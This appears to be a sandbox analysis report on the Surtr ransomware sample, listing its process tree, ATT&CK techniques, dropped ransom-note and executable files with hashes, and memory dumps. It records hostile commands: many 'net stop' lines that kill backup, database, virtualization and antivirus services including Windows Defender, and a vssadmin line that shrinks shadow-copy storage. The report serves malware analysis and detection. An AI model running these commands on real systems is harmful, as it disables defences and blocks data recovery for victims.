C:\Windows\system32\net1 stop "VeeamCatalogSvc"
5⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
3⤵
PID:5100

C:\Windows\system32\net.exe
net stop "VeeamCloudSvc"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamCloudSvc"
5⤵
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
3⤵
PID:388

C:\Windows\system32\net.exe
net stop "VeeamDeploymentService"
4⤵
PID:3664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamDeploymentService"
5⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
3⤵
PID:1224

C:\Windows\system32\net.exe
net stop "VeeamDeploySvc"
4⤵
PID:4908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamDeploySvc"
5⤵
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
3⤵
PID:276

C:\Windows\system32\net.exe
net stop "VeeamEnterpriseManagerSvc"
4⤵
PID:2180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
5⤵
PID:252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\net.exe
net stop "VeeamMountSvc"
4⤵
PID:260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamMountSvc"
5⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
3⤵
PID:3392

C:\Windows\system32\net.exe
net stop "VeeamNFSSvc"
4⤵
PID:1504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamNFSSvc"
5⤵
PID:3148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
3⤵
PID:2124

C:\Windows\system32\net.exe
net stop "VeeamRESTSvc"
4⤵
PID:4280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamRESTSvc"
5⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
3⤵
PID:4928

C:\Windows\system32\net.exe
net stop "VeeamTransportSvc"
4⤵
PID:3136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamTransportSvc"
5⤵
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "W3Svc"
3⤵
- Adds Run key to start application
PID:1464

C:\Windows\system32\net.exe
net stop "W3Svc"
4⤵
PID:4272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "W3Svc"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "wbengine"
3⤵
PID:1684

C:\Windows\system32\net.exe
net stop "wbengine"
4⤵
PID:1240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine"
5⤵
PID:3228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WRSVC"
3⤵
PID:2028

C:\Windows\system32\net.exe
net stop "WRSVC"
4⤵
PID:4960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WRSVC"
5⤵
PID:3620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
3⤵
PID:4388

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2008R2"
4⤵
PID:4116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
5⤵
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4112

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2008R2"
4⤵
PID:1932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
5⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
3⤵
PID:4444

C:\Windows\system32\net.exe
net stop "VeeamHvIntegrationSvc"
4⤵
PID:4212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
5⤵
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "swi_update"
3⤵
PID:4396

C:\Windows\system32\net.exe
net stop "swi_update"
4⤵
PID:3920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "swi_update"
5⤵
PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
3⤵
PID:3528

C:\Windows\system32\net.exe
net stop "SQLAgent$CXDB"
4⤵
PID:4988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$CXDB"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
3⤵
PID:4052

C:\Windows\system32\net.exe
net stop "SQLAgent$CITRIX_METAFRAME"
4⤵
PID:4508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
5⤵
PID:2908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
3⤵
PID:3684

C:\Windows\system32\net.exe
net stop "SQL Backups"
4⤵
PID:2108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups"
5⤵
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
3⤵
PID:2696

C:\Windows\system32\net.exe
net stop "MSSQL$PROD"
4⤵
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PROD"
5⤵
PID:976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
3⤵
PID:1372

C:\Windows\system32\net.exe
net stop "Zoolz 2 Service"
4⤵
PID:4400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service"
5⤵
PID:1928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
3⤵
PID:3000

C:\Windows\system32\net.exe
net stop "MSSQLServerADHelper"
4⤵
PID:664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerADHelper"
5⤵
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
3⤵
PID:964

C:\Windows\system32\net.exe
net stop "SQLAgent$PROD"
4⤵
PID:364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PROD"
5⤵
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628

C:\Windows\system32\net.exe
net stop "msftesql$PROD"
4⤵
PID:2256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "msftesql$PROD"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
3⤵
PID:1688

C:\Windows\system32\net.exe
net stop "NetMsmqActivator"
4⤵
PID:4224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator"
5⤵
PID:1416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
3⤵
PID:4568

C:\Windows\system32\net.exe
net stop "EhttpSrv"
4⤵
PID:4012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "EhttpSrv"
5⤵
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ekrn"
3⤵
PID:4196

C:\Windows\system32\net.exe
net stop "ekrn"
4⤵
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ekrn"
5⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
3⤵
PID:4200

C:\Windows\system32\net.exe
net stop "ESHASRV"
4⤵
PID:3972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ESHASRV"
5⤵
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
3⤵
PID:4432

C:\Windows\system32\net.exe
net stop "MSSQL$SOPHOS"
4⤵
PID:4632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
5⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
3⤵
PID:1388

C:\Windows\system32\net.exe
net stop "SQLAgent$SOPHOS"
4⤵
PID:5028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
5⤵
PID:904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AVP"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\system32\net.exe
net stop "AVP"
4⤵
PID:416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AVP"
5⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "klnagent"
3⤵
PID:4756

C:\Windows\system32\net.exe
net stop "klnagent"
4⤵
PID:4804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "klnagent"
5⤵
PID:1268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
3⤵
PID:1220

C:\Windows\system32\net.exe
net stop "MSSQL$SQLEXPRESS"
4⤵
PID:4500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
5⤵
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
3⤵
PID:5036

C:\Windows\system32\net.exe
net stop "SQLAgent$SQLEXPRESS"
4⤵
PID:4836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
5⤵
PID:940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "wbengine"
3⤵
PID:2452

C:\Windows\system32\net.exe
net stop "wbengine"
4⤵
PID:4820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine"
5⤵
PID:5008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "HvHost"
3⤵
PID:2304

C:\Windows\system32\net.exe
net stop "HvHost"
4⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "HvHost"
5⤵
PID:900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
3⤵
PID:4792

C:\Windows\system32\net.exe
net stop "vmickvpexchange"
4⤵
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmickvpexchange"
5⤵
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
3⤵
PID:3152

C:\Windows\system32\net.exe
net stop "vmicguestinterface"
4⤵
PID:680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicguestinterface"
5⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
3⤵
PID:852

C:\Windows\system32\net.exe
net stop "vmicshutdown"
4⤵
PID:1232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicshutdown"
5⤵
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
3⤵
PID:1908

C:\Windows\system32\net.exe
net stop "vmicheartbeat"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicheartbeat"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmcompute"
3⤵
PID:4888

C:\Windows\system32\net.exe
net stop "vmcompute"
4⤵
PID:2724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmcompute"
5⤵
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
3⤵
PID:4884

C:\Windows\system32\net.exe
net stop "vmicvmsession"
4⤵
PID:2768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvmsession"
5⤵
PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
3⤵
PID:4512

C:\Windows\system32\net.exe
net stop "vmicrdv"
4⤵
PID:984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicrdv"
5⤵
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
3⤵
PID:4880

C:\Windows\system32\net.exe
net stop "vmictimesync"
4⤵
PID:4896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmictimesync"
5⤵
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicvss"
3⤵
PID:3120

C:\Windows\system32\net.exe
net stop "vmicvss"
4⤵
PID:2020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss"
5⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
3⤵
PID:3148

C:\Windows\system32\net.exe
net stop "VMAuthdService"
4⤵
- Drops startup file
PID:3724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMAuthdService"
5⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
3⤵
PID:2236

C:\Windows\system32\net.exe
net stop "VMnetDHCP"
4⤵
PID:4240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMnetDHCP"
5⤵
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
3⤵
PID:2632

C:\Windows\system32\net.exe
net stop "VMware NAT Service"
4⤵
PID:4364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
5⤵
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
3⤵
PID:3324

C:\Windows\system32\net.exe
net stop "VMUSBArbService"
4⤵
PID:2984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMUSBArbService"
5⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
3⤵
PID:3228

C:\Windows\system32\net.exe
net stop "VMwareHostd"
4⤵
PID:2324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMwareHostd"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sense"
3⤵
- Adds Run key to start application
PID:3620

C:\Windows\system32\net.exe
net stop "Sense"
4⤵
PID:1940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sense"
5⤵
PID:2716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
3⤵
PID:4296

C:\Windows\system32\net.exe
net stop "WdNisSvc"
4⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WdNisSvc"
5⤵
PID:4376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WinDefend"
3⤵
PID:5024

C:\Windows\system32\net.exe
net stop "WinDefend"
4⤵
PID:4120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
5⤵
PID:2240

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3796

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Indicator Removal on Host

T1070

File Deletion

T1107

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
Filesize
8KB

MD5
53dab3a3443e1439e53220aff1e7490f

SHA1
4222d1841951b87cd54516d3381f8358791fd988

SHA256
ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4

SHA512
5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt
Filesize
621B

MD5
edb2c94c58363c1d8e428506e28d669f

SHA1
50041c9b823d76a932788d553b07cc25297a0ff7

SHA256
428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc

SHA512
024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\ID_DATA.surt
Filesize
14B

MD5
db84d0324aeb1f2a9c496b293adef33d

SHA1
79bc8117faef8c4f2273358b43c1280f0e70deea

SHA256
9c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab

SHA512
e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407

Download Submit
C:\ProgramData\Service\Private_DATA.surt
Filesize
1KB

MD5
99a04b59f115e55249d7323a446446df

SHA1
942399e4cb0d49fcf386b352f5bbc9f4ce4ae832

SHA256
af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3

SHA512
25a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d

Download Submit
C:\ProgramData\Service\Public_DATA.surt
Filesize
204B

MD5
07c7fc3eb4a68e9e968c0a7e22fb1092

SHA1
9d3804e00636a82d6d74812d6c6a4dcecaf5ef5d

SHA256
0f880c9481db083d9872faec40139e2a2b99eeae1fa98717634a51b84aeeb99b

SHA512
60d1a7f2620b526bec9378962566966deb53238a22610d5a728a0118d8f6ca2153c69dca6dedd87248f967736b1c31329adc07c930e5ccac467436d264eb580f

Download Submit
C:\ProgramData\Service\SURTR_README.hta
Filesize
8KB

MD5
53dab3a3443e1439e53220aff1e7490f

SHA1
4222d1841951b87cd54516d3381f8358791fd988

SHA256
ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4

SHA512
5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5

Download Submit
C:\ProgramData\Service\SURTR_README.txt
Filesize
621B

MD5
edb2c94c58363c1d8e428506e28d669f

SHA1
50041c9b823d76a932788d553b07cc25297a0ff7

SHA256
428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc

SHA512
024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a

Download Submit
C:\ProgramData\Service\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg
Filesize
30KB

MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico
Filesize
78KB

MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surt
Filesize
14B

MD5
db84d0324aeb1f2a9c496b293adef33d

SHA1
79bc8117faef8c4f2273358b43c1280f0e70deea

SHA256
9c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab

SHA512
e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surt
Filesize
1KB

MD5
99a04b59f115e55249d7323a446446df

SHA1
942399e4cb0d49fcf386b352f5bbc9f4ce4ae832

SHA256
af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3

SHA512
25a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.hta
Filesize
8KB

MD5
53dab3a3443e1439e53220aff1e7490f

SHA1
4222d1841951b87cd54516d3381f8358791fd988

SHA256
ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4

SHA512
5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
memory/268-198-0x0000026F41838000-0x0000026F41840000-memory.dmp

Filesize
32KB

Download
memory/344-157-0x0000000000000000-mapping.dmp

Download
memory/576-151-0x0000000000000000-mapping.dmp

Download
memory/592-141-0x0000000000000000-mapping.dmp

Download
memory/608-153-0x0000000000000000-mapping.dmp

Download
memory/664-140-0x0000000000000000-mapping.dmp

Download
memory/772-123-0x0000000000000000-mapping.dmp

Download
memory/1068-154-0x0000000000000000-mapping.dmp

Download
memory/1136-149-0x0000000000000000-mapping.dmp

Download
memory/1176-142-0x0000000000000000-mapping.dmp

Download
memory/1184-122-0x0000000000000000-mapping.dmp

Download
memory/1220-177-0x0000000000000000-mapping.dmp

Download
memory/1252-147-0x0000000000000000-mapping.dmp

Download
memory/1264-143-0x0000000000000000-mapping.dmp

Download
memory/1320-138-0x0000000000000000-mapping.dmp

Download
memory/1336-137-0x0000000000000000-mapping.dmp

Download
memory/1372-155-0x0000000000000000-mapping.dmp

Download
memory/1380-159-0x0000000000000000-mapping.dmp

Download
memory/1472-134-0x0000000000000000-mapping.dmp

Download
memory/1520-124-0x0000000000000000-mapping.dmp

Download
memory/1612-160-0x0000000000000000-mapping.dmp

Download
memory/1616-139-0x0000000000000000-mapping.dmp

Download
memory/1732-125-0x0000000000000000-mapping.dmp

Download
memory/1780-162-0x0000000000000000-mapping.dmp

Download
memory/1932-171-0x0000000000000000-mapping.dmp

Download
memory/1964-161-0x0000000000000000-mapping.dmp

Download
memory/2060-164-0x0000000000000000-mapping.dmp

Download
memory/2080-166-0x0000000000000000-mapping.dmp

Download
memory/2156-176-0x0000000000000000-mapping.dmp

Download
memory/2180-168-0x0000000000000000-mapping.dmp

Download
memory/2228-169-0x0000000000000000-mapping.dmp

Download
memory/2260-121-0x0000000000000000-mapping.dmp

Download
memory/2332-119-0x0000000000000000-mapping.dmp

Download
memory/2332-180-0x0000000000000000-mapping.dmp

Download
memory/2392-145-0x0000000000000000-mapping.dmp

Download
memory/2456-170-0x0000000000000000-mapping.dmp

Download
memory/2488-158-0x0000000000000000-mapping.dmp

Download
memory/2552-146-0x0000000000000000-mapping.dmp

Download
memory/2568-144-0x0000000000000000-mapping.dmp

Download
memory/2600-136-0x0000000000000000-mapping.dmp

Download
memory/2684-179-0x0000000000000000-mapping.dmp

Download
memory/2696-178-0x0000000000000000-mapping.dmp

Download
memory/2716-156-0x0000000000000000-mapping.dmp

Download
memory/2772-133-0x0000000000000000-mapping.dmp

Download
memory/2784-135-0x0000000000000000-mapping.dmp

Download
memory/3028-148-0x0000000000000000-mapping.dmp

Download
memory/3060-126-0x0000000000000000-mapping.dmp

Download
memory/3324-173-0x0000000000000000-mapping.dmp

Download
memory/3344-131-0x0000000000000000-mapping.dmp

Download
memory/3444-172-0x0000000000000000-mapping.dmp

Download
memory/3520-129-0x0000000000000000-mapping.dmp

Download
memory/3640-132-0x0000000000000000-mapping.dmp

Download
memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/3680-116-0x0000000140133F50-mapping.dmp

Download
memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/3684-152-0x0000000000000000-mapping.dmp

Download
memory/3700-175-0x0000000000000000-mapping.dmp

Download
memory/3744-127-0x0000000000000000-mapping.dmp

Download
memory/3788-181-0x0000000000000000-mapping.dmp

Download
memory/3920-130-0x0000000000000000-mapping.dmp

Download
memory/3968-174-0x0000000000000000-mapping.dmp

Download
memory/3984-128-0x0000000000000000-mapping.dmp

Download
memory/4004-150-0x0000000000000000-mapping.dmp

Download
memory/4016-163-0x0000000000000000-mapping.dmp

Download
memory/4020-165-0x0000000000000000-mapping.dmp

Download
memory/4032-120-0x0000000000000000-mapping.dmp

Download
memory/4052-167-0x0000000000000000-mapping.dmp

Download